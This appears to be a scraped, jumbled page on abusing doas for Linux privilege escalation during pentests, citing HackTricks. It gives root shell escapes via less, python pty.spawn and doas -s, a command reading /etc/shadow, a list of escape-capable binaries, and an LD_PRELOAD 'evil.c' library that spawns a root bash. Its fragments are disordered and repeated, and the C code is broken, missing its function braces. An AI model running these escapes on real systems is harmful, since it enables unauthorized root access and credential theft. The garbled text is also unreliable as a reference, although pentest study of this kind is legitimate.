Hacktricks Doas -

permit keepenv user1 as root Compile a malicious lib:

— HackTricks Want more? Check out the HackTricks Linux Privilege Escalation guide for deeper dives.

doas /usr/bin/python3 -c 'import pty;pty.spawn("/bin/sh")' Many binaries allow shell escapes. hacktricks doas

// evil.c #include <stdio.h> #include <stdlib.h> #include <unistd.h> __attribute__((constructor)) void init() setuid(0); setgid(0); system("/bin/bash");

permit user1 as root cmd /usr/bin/less doas less /etc/hosts # then type: !/bin/bash Known binaries for escapes: less , more , vi , vim , nano , awk , find , man , git , tmux , screen , ftp , irb , lua , perl , python , ruby , scp , tar . If keepenv is set, doas keeps LD_PRELOAD , LD_LIBRARY_PATH , PYTHONPATH , etc. permit keepenv user1 as root Compile a malicious

doas /usr/bin/less /etc/shadow # inside less: !/bin/sh Or Python bypass:

Example script:

#!/bin/sh doas /usr/bin/chown user "$1" Exploit:

In this post, we’ll break down how doas works, where to find it, and how to abuse it for privilege escalation during a pentest. doas was originally from OpenBSD. It allows users to execute commands as another user (usually root) with a minimal configuration file: /etc/doas.conf // evil

doas -s # or doas /bin/sh If the config allows a wildcard path, you might inject arguments.